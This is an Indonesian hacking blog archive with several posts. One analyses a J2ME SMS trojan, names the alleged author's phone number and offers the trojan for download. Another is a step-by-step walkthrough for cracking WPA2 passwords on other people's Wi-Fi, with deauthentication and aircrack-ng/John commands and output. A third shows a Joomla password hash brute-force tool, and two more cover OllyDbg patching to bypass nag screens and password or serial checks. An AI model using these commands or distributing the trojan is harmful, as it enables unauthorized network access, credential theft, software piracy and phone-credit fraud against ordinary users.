Archive for the ‘Cracking’ Category

Trojan Horse Pada Java Mobile Phone

Posted: Agustus 1, 2012 in Cracking

ACKINTRO
Sebuah lelucon dari founder Binus Hacker membuat Saya berpikir untuk menulis artikel ini. Yang intinya memiliki ketertarikan untuk mengetahui lebih dalam, bagaimana Java mampu dijadikan sebagai alat penyerangan ke sebuah sistem atau user victim.

Seperti biasa Saya ingin menulis artikel yang mampu dimengerti oleh semua kalangan, tidak hanya untuk orang-orang yang memang berkonsentrasi pada bidang komputer, Saya ingin menulis artikel yang juga bisa dimengerti oleh tukang bakso, tukang ojek, penggembala kambing (seperti Saya :D ), tukang jagal, bang mamat tukang gali kubur, kang paijo penjaga warung, cak mansur di musholla sebelah dan lainnya. Maaf sangat tidak memungkinkan kalau Saya absen warga satu kelurahan seluruhnya, karena akan membuat artikel ini seperti data Dinas Sosial :D

Sebenarnya sangat sulit untuk menemukan Trojan Horse sederhana yang bisa dijadikan materi pembahasan pada artikel ini. Beberapa dari Trojan Horse menggunakan teknik elit yang tidak mudah dipahami oleh pemula sekalipun, mengingat Java adalah bahasa pemrograman High Level.

Untungnya setelah beberapa lama bergerilya di internet, kost dengan beberapa orang Rusia, Jerman dan Spanyol untuk mendapatkan referensi (Howdy, My Reverser friends.. You’re all awesome :D ) serta bertapa selama 7 hari, 7 malam, 7 jam, 7 menit, 7 detik lebih sedikit.. kurang 1 menit dibagi seperempat detik (Kata Pak guru matematika berapa hasilnya?? :D ), Saya bisa menemukan materi unik Trojan Horse dari Indonesia.

 

DEFINITION
Adalah program apapun yang memiliki tujuan tersembunyi. Trojan merupakan salah satu dari sekian banyak penyebab utama pembobolan sebuah sistem. Jika Anda mendapatkan sebuah program dari chat room, new group, atau dari e-mail yang tidak pernah diharapkan, program tersebut kemungkinan trojan dengan beberapa tujuan yang bersifat subversif. Sebagai contoh, Trojan bisa diprogram untuk menerima kata sandi dari user account yang bisa dipergunakan hacker memasuki kembali suatu sistem setiap saat. Rootkit seringkali berisi program-program trojan.

Trojan adalah program Rootkit 100% merugikan. Trojan hanya menguntungkan satu pihak saja, yaitu penyerang. Untungnya kemudahan dalam mendapatkan informasi mengenai Trojan di internet, membuat semua pengguna komputer lebih waspada. Namun hal inilah yang membuat Trojan mengalami beberapa perubahan yang variatif, Trojan tidak lagi sederhana dan mudah ditebak seperti jaman dulu, Trojan semakin unik seperti halnya pada Trojan yang dibahas pada artikel ini. Teknik Social Engineering menjadi salah satu alat efektif yang dipergunakan oleh penyerang untuk menyebarluaskan Trojan. Untuk mempelajari lebih lanjut mengenai program yang termasuk dalam keluarga Rootkit, Trojan dan karakteristiknya, Anda bisa membaca artikel Saya yang berjudul “Key Logger – Hack Tool Pencuri Informasi”

 

SOME USEFUL APIS
Di bawah ini Saya cantumkan beberapa fungsi Java API Wireless Toolkit yang dipergunakan pada pemrograman Trojan Java Mobile Phone :

1. javax.microedition.io
Class Connector

public class Connector
extends Object

Kelas ini adalah pabrik untuk menciptakan obyek Connection baru.
Penciptaan Koneksi-Koneksi dilakukan secara dinamis dengan melihat suatu implementasi kelas protokol yang namanya dibentuk dari nama platform (pembacaan dari sebuah sistem properti) dan nama protokol dari koneksi yang diminta (Diekstrak dari parameter string yang disediakan oleh aplikasi programmer.) Parameter string yang menjelaskan target harus sesuai dengan format URL seperti yang diuraikan pada RFC 2396.

{scheme}:[{target}][{params}]
where {scheme} is the name of a protocol such as http}.
The {target} is normally some kind of network address.
Any {params} are formed as a series of equates of the form “;x=y”. Example: “;type=a”.

2. javax.microedition.io
Interface Connection

public interface Connection

Ini adalah tipe yang paling dasar dari koneksi umum. Hanya metode terdekat yang didefinisikan. Tidak ada metode terbuka yang didefinisikan di sini sebab pembukaan selalu dilakukan dengan menggunakan metode Connector.open().

3. javax.microedition.midlet
Class MIDlet

public abstract class MIDlet
extends Object

MIDlet adalah sebuah aplikasi profil MID. Aplikasi tersebut harus memperluas kelas ini agar mengijinkan software manajemen aplikasi untuk mengendalikan MIDlet dan mampu mendapat kembali properti dari descriptor aplikasi dan perubahan status permintaan. Metode kelas ini mengijinkan software manajemen aplikasi untuk melakukan create, start, pause, dan destroy suatu MIDlet.

Constructor

    • MIDlet

protected MIDlet()

Method

    • getAppProperty

public final String getAppProperty(String key)

    • startApp

protected abstract void startApp()
throws MIDletStateChangeException

    • pauseApp

protected abstract void pauseApp()

    • destroyApp

protected abstract void destroyApp(boolean unconditional)
throws MIDletStateChangeException

    • notifyDestroyed

public final void notifyDestroyed()

 

ART OF ATTACKING
Anda bisa mendapatkan Trojan SMS ini di internet melalui mesin pencarian Google versi web ataupun versi mobile dengan mengetikan keyword “YAHOO MAIL INDOSAT 2011.JAR” di kolom pencarian. Sebelumnya, Saya ingin mengucapkan terima kasih kepada sang penyerang yang telah “BAIK HATI” meninggalkan informasi tentang dirinya dengan sangat jelas.. Sangat jarang seorang Hacker ataupun Cracker meninggalkan informasi pribadinya kecuali dengan alasan khusus karena hal tersebut adalah perbuatan bunuh diri! Pelacakan lokasi penyerang bisa dilakukan dari data Trojan, Server upload, Nomer telpon seluler, IP address, image header dan lainnya.. Hacker dan Cracker tidak akan melakukan tindakan kriminal dan kebodohan seperti ini, kecuali sang pembuat Trojan adalah maling kambuhan atau ingin menjadi artis dadakan di daftar pencarian orang Kepolisian! :D

$$$$$$$$$$$$$$$$$$$$

Program Content

Screenshot Program Content

Untuk membaca isi program “YAHOO MAIL INDOSAT 2011.JAR” Anda bisa mengetikkan perintah JAR TF “YAHOO MAIL INDOSAT 2011.JAR” pada console. Jika pada komputer Anda tidak terinstall Java, Anda bisa mempergunakan WinRAR, Winzip dan lainnya untuk melakukan ekstraksi file. Jangan lupa terlebih dahulu gantilah ekstensi program menjadi “ZIP”. Misalnya dari “YAHOO MAIL INDOSAT 2011.JAR” menjadi “YAHOO MAIL INDOSAT 2011.ZIP”. Dari data “MANIFEST.MF” yang ada, Saya menemukan beberapa hal :

Nama file : YAHOO MAIL INDOSAT 2011.JAR
Nama midlet : YAHOO ISAT
Tanggal pembuatan : 2009-11-15
Waktu pembuatan : 18:48
Nomer HP penyerang : 085751351335
Provider yang digunakan : INDOSAT (Kode Fitur 151)
Metode serangan : Transfer pulsa
Kerugian pulsa minimal : Rp. 2.000 – 10.000 Setiap launching
URL : http://luana.com
MicroEdition-Config : CLDC-1.0
MicroEdition-Profile : MIDP-2.0
Malware class : Cdacc5617db4e975c5890b0b913c21696

CATATAN : Data diatas sesuai dengan data asli penyerang yang tertera pada file “MANIFEST.MF” tanpa mengalami perubahan sedikitpun dari penulis. Anda bisa menganalisa dan membandingkan keaslian data dengan Trojan sejenis yang terdapat di internet. Untuk membaca data, Anda bisa mempergunakan Notepad.

 

Metode penyerangan adalah mengirimkan SMS transfer pulsa sebanyak 1-10 kali dengan nominal Rp. 2000,-/SMS setiap kali program dijalankan, dengan perantara fitur 151 provider INDOSAT. Teknik Social Engineering yang dipergunakan mirip dengan aplikasi game yang booming pada tahun 2004-2005, yang mengharuskan user untuk mengirimkan sejumlah SMS sebagai biaya pembelian sebelum game dijalankan. Kebanyakan user pasti tertipu jika tidak mengetahui apa yang sebenarnya mereka jalankan. Saya harap pihak kepolisian dan intelejen Indonesia meluangkan waktu membaca artikel ini, agar bisa menindaklanjuti serta mampu mengantisipasi kasus seperti ini di masa yang akan datang. Jadikan Indonesia lebih baik! (Go.. Go.. Go.. Indonesia Police Cyber! Chaya.. Chaya.. Indonesia Police Dancer.. Howdy, Briptu Norman Kamaru! :D )

Konsep Trojan secara keseluruhan mengadopsi konsep dari “J2ME/TrojanSMS.Konov”, hal ini bisa Anda lihat pada file binary “Cdacc5617db4e975c5890b0b913c21696.class”. Sebagai informasi, hanya beberapa orang Hacker di dunia ini yang mampu membaca file binary (bahasa mesin) secara langsung sebagai contoh rekan-rekan dari Metasploit dan rekan-rekan dari beberapa komunitas yang Saya sebutkan padaGreetz di bagian bawah artikel ini, Saya harap Anda tidak menemui kesulitan membaca file tersebut melalui Notepad atau Hexa Editor. Jangan kaget, karakter yang akan Anda jumpai mirip karakter alien dan cakar ayam:D

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Text View

Screenshot Text View

Kelebihan dari teknik Hacker bidang Reverse Engineering salah satunya adalah mampu membalik kode binary (Kode mesin) menjadi kode (Source Code) yang mudah dibaca oleh manusia. Bagi Anda yang bekerja sebagai programmer, alangkah baiknya untuk berhati-hati mengamankan software Anda. Sebuah software komersial yang dirubah menjadi Source Code akan membuat orang lain mampu membuat software yang mirip seperti buatan Anda, hanya dengan menjiplak kode software Anda!!! Dibawah ini screenshot favorit rekan-rekan Hacker bidang Reverse Engineering. Maaf, sengaja menampilkan beberapa baris saja.. Terlalu panjang jika menampilkan kode Assembly keseluruhan.. Toh sama saja hasilnya, karena source code yang sebenarnya cuma 42 baris.. Lagipula sesama reverser bisa mempelajari sendiri tanpa perlu membaca artikel ini :D

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Amazing Assembly

Screenshot Amazing Assembly

Jika Anda sudah patah hati karena kesulitan membaca binary, maka ada baiknya Anda membaca file“TrojanSMS.java” yang lebih manusiawi :D Memang tidak mudah membaca binary, jadi Saya meluangkan waktu mengkode ulang file binary yang ada menjadi Source Code bahasa pemrograman Java yang dapat dibaca oleh mata manusia. Saya harap Anda bisa memahami cara kerja Trojan SMS ini. “Wireless Toolkit”dibutuhkan sebagai media pemrograman Java Mobile Phone.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Source Code

Screenshot Source Code

PERHATIAN : Source code yang disertakan pada artikel ini hanya sebagai pembelajaran, bisa dicompile ulang untuk menghasilkan binary. Saya tidak bertanggungjawab terhadap penyalahgunaan, kerusakan, kerugian yang disebabkan oleh pihak lain melalui Source Code ini!!! Untuk mendapatkan Source Code lengkap silahkan kunjungi Website Saya.

 

FINAL NOTES
Trojan SMS diatas hanyalah salah satu dari sekian banyak Trojan yang mentargetkan Java Mobile Phone. Trojan ini bisa dikatakan sebagai Lame Trojan, dibuat oleh Lamer dan bisa dimodifikasi oleh Scriptkiddies dengan mudah. Namun jangan pernah menyepelekan hal kecil. Apa yang akan terjadi jika Trojan ini berada di tangan orang yang lebih cerdas dan disalahgunakan? Tentunya tidak akan lagi mencuri pulsa Anda, melainkan mencuri LOG, Cookies dan data pribadi lainnya yang tersimpan di Mobile Phone Anda!

Solusi murah dan praktis dari Saya untuk menghindari kejahatan Trojan Java Mobile Phone dan sejenisnya adalah selalu aktifkan hak akses seluruh software yang terdapat pada Mobile Phone Anda menjadi mode“Prompt” atau mode pemberitahuan. Misal : Network access, Read and Write data, Auto invocation, Messaging, Multimedia, Local connectivity, dan lainnya.

Saya sangat menyarankan kepada seluruh rekan-rekan yang membaca artikel ini untuk selalu waspada, jika Antivirus Anda tidak mendeteksi file Trojan SMS yang disertakan bersama artikel ini, silahkan menghubungi vendor Antivirus yang Anda miliki. Dengan cara mengirimkan sampel file “YAHOO MAIL INDOSAT 2011.JAR”ke vendor Antivirus. Jika Anda mengklaim diri Anda sebagai seorang Hacker tentunya Anda tidak ingin memperparah keadaan dengan menyembunyikan ataupun mempergunakan kode ini untuk kejahatan, bukan? Hacker sejati tidak berbuat kriminal dan merugikan orang lain, Hacker sejati melakukan sesuatu yang berarti bagi seluruh umat manusia sesuai dengan kode etik Hacker dan Jargon. Orang yang berbuat kriminal melalui komputer, merugikan, ingin untung sendiri dan tidak memikirkan nasib orang lain adalah MALING alias KRIMINAL alias TERORIS bukan Hacker, bukan juga bagian dari komunitas Hacker dan Binus Hacker. Semoga artikel Saya bermanfaat dan dapat membantu Anda mengamankan diri dari kejahatan cyber. I am Hacker, I am Cracker.. I am still a Farmer :D

 

DOWNLOAD TROJAN HORSE MOBILE PHONE .JAR

Iklan

Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.

Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)

Download BackTrack 5 Disini:

Download BackTrack 5

Download Wordlist John The Ripper Disini:
Download Wordlist

Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install :)

Wireless Hacking Using BackTrack 5

Oke mari kita lanjutkan:

1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:

root@binushacker:~# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)

2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:


root@binushacker:~# airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless

3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

 

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2

CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

 

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:

4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:


root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#

 

5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless

BSSID STATION PWR Rate Lost Packets Probes

38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 – 6 0 161

6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:00] 48 keys tested (489.60 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu: W!R3L3$$PWD

7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904

[00:00:22] 11484 keys tested (534.50 k/s)

KEY FOUND! [ W!R3L3$$PWD ]

Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D

Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B

EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#

Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD

Untuk lebih detailnya, silakan lihat video berikut:

Saatnya untuk melakukan crack password joomla dengan menggunakan Joomla Cracker Tools. Tools ini digunakan untuk melakukan BruteForce password dari hash yang didapatkan dari joomla password biasanya MD5+SALT.

Yang perlu disiapkan adalah:
1. Tools “joomla-cracker.pl” yang digunakan sebagai alat untuk melakukan bruteforce,

2. Buatlah file “hash.txt” yang akan digunakan untuk menyimpan hash yang akan di crack.
3. Buatlah file “wordlist.txt” yang akan digunakan sebagai kumpulan dictionary password. Download wordlist generator disini.

4. Perl Engine harus sudah terinstall di Operating System yang akan di pakai.

Setelah semua file terlengkapi, maka cara menjalankannya adalah ./joomla-cracker.pl hash.txt wordlist.txt
1. Kumpulan file dalam directory hacking untuk melakukan crack joomla hash + salt.

2. Contoh hash yang perlu dimasukkan dalam file “hash.txt“

3. Contoh kumpulan wordlist yang dimasukkan dalam file “wordlist.txt“

4. Berikut adalah cara menjalankan joomla-cracker tools ./joomla-cracker.pl hash.txt wordlist.txt

Nah terlihat hasilnya disana bahwa hasil crack username + passwordnya adalah:
1. Username: rahmat & Password: 123456
2. Username: dede & Password: 123456
3. Dst.
Selamat mencoba dan semoga berhasil mengcrack joomla username & password

HackINTRO
Artikel ini ditujukan untuk semua level pembaca, tidak ada perbedaan, Leet, Newbie, melintasi semua batas, NO-SARA, We’re the one for equality.. Punk Rock, oi-oi! :D Sebelumnya Saya ingin menyampaikan salam hormat dan persahabatan kepada seluruh rekan-rekan Hacker yang pernah mengenal Saya di Indonesia, terutama rekan-rekan veteran h4xx0r yang mengagumkan.. :D

Pernahkah bertemu dengan software trial alias shareware atau mempergunakan shareware? Shareware adalah program trial (tidak gratis) yang memiliki keterbatasan dan mengharuskan user untuk membeli atau membayar software tersebut sebelum bisa dipergunakan secara penuh atau tanpa batasan. Artikel ini akan mencoba membahas hal paling dasar dari skema proteksi software berbayar (shareware). Salah satu skema shareware yang cukup terkenal adalah Nag atau kotak dialog yang menampilkan pesan tentang status software, apakah sudah dibeli (Registered) atau masih trial (Unregistered). Sebenarnya artikel ini merupakan modifikasi dari salah satu materi seminar Saya di pertengahan tahun 2009 untuk instansi pendidikan jurusan Teknik Informatika, dimana saat itu Saya diminta memperagakan demo cracking sederhana yang sering dijumpai pada skema shareware.

Artikel ini TIDAK bertujuan untuk mengajarkan cara mencuri ataupun membajak software berbayar, namun lebih mengutamakan kepada pemahaman tentang kerawanan sebuah sistem. Tidak satupun target yang dipergunakan sebagai kelinci percobaan pada artikel ini yang berstatus shareware milik pihak lain. Target yang disediakan adalah software buatan Saya pribadi, jadi tidak ada pihak lain yang dirugikan disini kecuali Saya (Waktu istirahat dirumah seusai kerja terpangkas karena menulis artikel ini dan uang pribadi Saya terpangkas karena dipergunakan untuk membayar koneksi broadband internet melakukan download compiler Assembler dan posting artikel..)

Kepada seluruh “Prankster” alias “Not Action Talk Only” yang selalu negatif dalam menilai aktifitas Hacker, sebaiknya baca terlebih dahulu sebelum menilai.. kenapa malah kalian yang ribut? Padahal yang terpakai waktu, tenaga dan uang pribadi Saya, bukan milik kalian! Sirik tanda tak mampu..

Tool On Demand :

  1. Ollydbg, bisa Anda dapatkan di www.ollydbg.de.
  2. File target “Target.exe” telah disertakan bersama artikel ini atau kunjungi website Saya dihttp://www.mrhpx.co.nr (Saya membuatnya secara pribadi untuk menghindari pelanggaran UU Hak cipta dan DMCA yang menyebalkan!)
  3. Pengetahuan tentang Assembly (Tidak tahu sama sekali juga tidak masalah :D )
  4. Red Palmall.. (Untuk motivasi dan Inspirasi.. Serta membantu meningkatkan pendapatan pajak pemerintah Republik Indonesia :D )
  5. Padi – Tempat Terakhir.mp3.. (Lagu yang bagus, untuk mengupdate database musik dan jiwa, ingat jangan membeli bajakan! :D )

Target Description
Karakter target seperti yang telah disebutkan diatas adalah menampilkan Nagscreen atau MessageBox di awal software dijalankan. Untuk menghilangkan tampilan Nagscreen MessageBox, user harus melakukan pembelian.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot NagScreen
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Tugas yang harus dikerjakan disini adalah menonaktifkan MessageBox atau kotak dialog pesan. Sehingga software tidak akan menampilkan MessageBox lagi diawal software dijalankan untuk selamanya.

Tidak ada hal yang lebih menyenangkan di bidang keamanan komputer selain melakukan analisa Reverse Engineering file Binary. Rekan-rekan yang penasaran terhadap isu Deface Website, Rootkit, Software Cracking, Penetrasi Sistem, DDoS, Buffer Overflow dan sejenisnya wajib mempelajari Reverse Engineering. Dari bidang inilah semua isu security berasal, baik mengenai Exploit, Vulnerable atau Bugs Sistem dan lain sebagainya. Sebelum membaca lebih lanjut Saya sangat merekomendasikan kepada Anda untuk membaca artikel Saya yang berjudul “Tutorial Injeksi Executable – Bagian 1 : MessageBox” dan “Tutorial Injeksi Executable-Bagian 2-Splash Screen” kedua artikel tersebut bisa membantu Anda dalam memahami dasar Reverse Engineering jika Anda menemui kesulitan saat membaca artikel ini.

The Beginning
Jalankan Ollydbg kemudian load “Target.exe”.. Tampilan akan terlihat seperti pada Screenshot dibawah ini. Khusus bagi Anda yang termasuk dalam tingkatan bukan newbie, disini Anda tentu sudah bisa membacaEntry Point (EP) dan menentukan langkah untuk mematahkan proteksi.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Load Target
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

CATATAN : Address yang terdapat pada komputer Anda mungkin berbeda dengan yang terdapat pada artikel ini. Selalu ikuti Address pada komputer Anda.

Pada layar utama, Klik kanan->Search for->All referenced text strings. Setelah itu Anda akan berada pada jendela baru yang menampilkan bermacam-macam string, coba cari dan arahkan mouse Anda pada string yang bertuliskan “Software SHAREWARE KEREN #1 di Dunia dan Alam Bawah Sadar”, lalu klik ganda atau tekan enter.

Anda akan kembali lagi menuju jendela utama, coba Anda arahkan mouse satu baris ke atas tepatnya alamat1314156F di instruksi “6A 24” atau “PUSH 24”. Anda akan menjumpai tanda panah berwarna merah“Conditional Jump” atau “Lompatan Dengan Memperhatikan Kondisi” yang berasal dari alamat 13141533 “EB 3A”.

MessageBox (Win32 Programmer’s Reference)
Fungsi MessageBox menciptakan, menampilkan dan mengoperasikan sebuah dialog pesan. Dialog pesan berisi suatu gambaran-aplikasi pesan dan judul, ditambah berbagai kombinasi dari tombol tekan dan ikon yang dikenal.

Info
Windows NT : Yes
Win95 : Yes
Win32s : Yes
Import Library : user32.lib
Header File : winuser.h
Unicode : WinNT; Win95
Platform Notes : None

Syntax
int MessageBox(
HWND hWnd, // handle of owner window
LPCTSTR lpText, // address of text in message box
LPCTSTR lpCaption, // address of title of message box
UINT uType // style of message box
);

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Assembly Code
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Logical, Analyze, ATTACK.. CRACKadabra!™
Saat software dijalankan akan langsung menuju ke alamat 13141533 “EB 3A”. Yang berfungsi untuk menjalankan instruksi di alamat 1314156F “PUSH 24” yang berisi Nagscreen atau MessageBox. Di alamat13141586 “CMP EAX,7” software melakukan pemeriksaan, yaitu :

  1. Jika user menekan “No” alamat 13141589 “JE SHORT TARGET.1314158D” maka kode akan mendarat di alamat 1314158D “PUSH 0” yang akan menyebabkan software exit.
  2. Sedangkan jika user menekan “Yes” alamat 1314158B “JMP SHORT TARGET.13141594” maka kode akan mendarat di alamat 13141594 “PUSH 0” yang akan menyebabkan software berjalan secara normal.

Dari data analisa diatas, maka bisa disimpulkan beberapa metode yang bisa dipakai untuk menonaktifkan Nagscreen atau MessageBox. Saya bukan tipe Hacker yang pelit ataupun tipe Hacker bego dan matre yang suka menjual teknik Hacker yang cepat basi, seperti kebanyakan buku Hacker mahal yang sering Anda temukan di toko buku online dan offline di sekitar Anda. Saya tidak ingin hanya memberikan satu metode saja, Saya lebih menyukai memberi Anda beberapa metode dalam pemecahan permasalahan. Orang yang hanya memiliki satu metode strategi dalam menghadapi lawan adalah orang yang cukup konyol. Beberapa metode yang bisa dipergunakan, yaitu :

    1. Metode 1 – JUMP

Merubah lompatan, cara ini adalah cara paling efektif dan efisien. Yaitu merubah arah tujuan dari lompatan instruksi, teknik ini hanya memerlukan perubahan nilai 1 byte saja!

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Method 1 – JUMP
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Untuk menerapkan teknik ini cukup mudah, pada alamat 13141533 “JMP SHORT TARGET.1314156F”, rubahlah nilai “EB 3A” menjadi “EB 5F”. Hal ini akan membuat software tidak menghiraukan kode Nagscreen atau MessageBox dan langsung menuju alamat 13141594 “PUSH 0” untuk menjalankan program secara normal.. TANPA NAGSCREEN!

    1. Metode 2 – NOP

Meniadakan proses instruksi, cara ini adalah cara efektif namun kurang efisien mengingat banyak terbentuknya Code Cave. Yaitu dengan meniadakan beberapa instruksi dengan cara merubahnya sebagai instruksi yang tidak dijalankan.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Method 2 – NOP
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Untuk menerapkan teknik ini, cukup blok dengan cursor dari alamat 1314156F “PUSH 24” sampai dengan 13141581 “CALL <JMP.&USER32.MESSAGEBOXA>” (Referensi lihat Screenshot Assembly Code). Kemudian Klik kanan->Binary->Fill with NOPs. Hal ini akan membuat software tidak lagi mempunyai Nagscreen atau MessageBox, meskipun instruksi pemeriksaan masih ada namun tidak mempengaruhi kinerja software. Dengan begitu software akan menuju alamat 13141594 “PUSH 0”untuk menjalankan program secara normal.. TANPA NAGSCREEN!

Final Notes
Tugas sudah berhasil dikerjakan dengan baik, software “Target.exe” tidak lagi menampilkan Nagscreen atau MessageBox. Mudah bukan? Tidak sampai 1 Menit, Nagscreen berhasil dilumpuhkan. Software“Target.exe” hanyalah salah satu contoh nyata dari bugs shareware karena kelalaian Programmer (Mungkin saja programmernya dulu kuliah di jurusan ilmu manajemen dan kesehatan hewan seperti Saya, jadi sedikit lupa tentang cara pemrograman yang tepat :D ). Kenapa bisa begitu? Karena teknik diatas memakai “Text String” sebagai acuan.

Jika saja software tersebut menggunakan teknologi seperti obfuscation atau menyembunyikan string tentunya tidak akan semudah ini berhasil dilumpuhkan. Percaya atau tidak, hampir sekitar 70% software shareware di seluruh dunia menggunakan Nagscreen atau MessageBox dan menampilkan Text String! Terutama software shareware produksi dalam negeri! Saya yakin Anda bisa membayangkan betapa rumitnya hidup sebagai programmer dengan resiko software mereka dibajak. Saran untuk Anda, jangan pernah mempergunakan software bajakan. Jika Anda belum memiliki uang, menabunglah, belilah lisensi resmi jika sudah memiliki uang atau pergunakan Open Source. Programmer juga butuh makan, mereka menjual software agar bisa mendapatkan penghasilan. Hacker terlahir untuk membantu sesama, bukan merugikan sesama. Semoga artikel Saya bermanfaat bagi Anda dan dapat membantu Anda mengamankan diri dari kejahatan cyber. I am a Hacker.. I am a Cracker.. But I am still a Farmer! :)

From binushacker.net

Tutorial by : MRHPx aka Rizal

Basic Cracking dengan Ollydbg

Posted: Juli 28, 2012 in Cracking

Ini adalah teknik dasar crack program dengan menggunakan Software OllyDbg (Debuger code), caranya mengganti String JE (Jump If Equal) menjadi JMP (Jump) di dalam struktur program yang di crack. Jadi semua perintah dalam blok JE atau dalam bahasa pemrograman adalah “IF” di dalam struktur kode program akan di lewati.

Dalam video ini contoh sebuah program yang di crack akan melewati permintaan password saat program tersebut di akses. Cara ini juga bisa di gunakan untuk crack suatu software yang di lindungi dengan menggunakan SERIAL NUMBER.

Download OllyDbg dan Contoh Program:

Download OllyDBG

Kemudian simak, pelajari dan pahami video tutorial berikut:

Tutorial seorang anak remaja dengan mudahnya “crack” aplikasi menggunakan OllyDBG:

Untuk bisa melakukan cracking seperti diatas, silakan download tool berikut:
1. Crackme program:
Download OllyDBG

2. Ollydbg Program:
Download OllyDBG

Selamat mencoba dan semoga berhasil.

From binushacker.com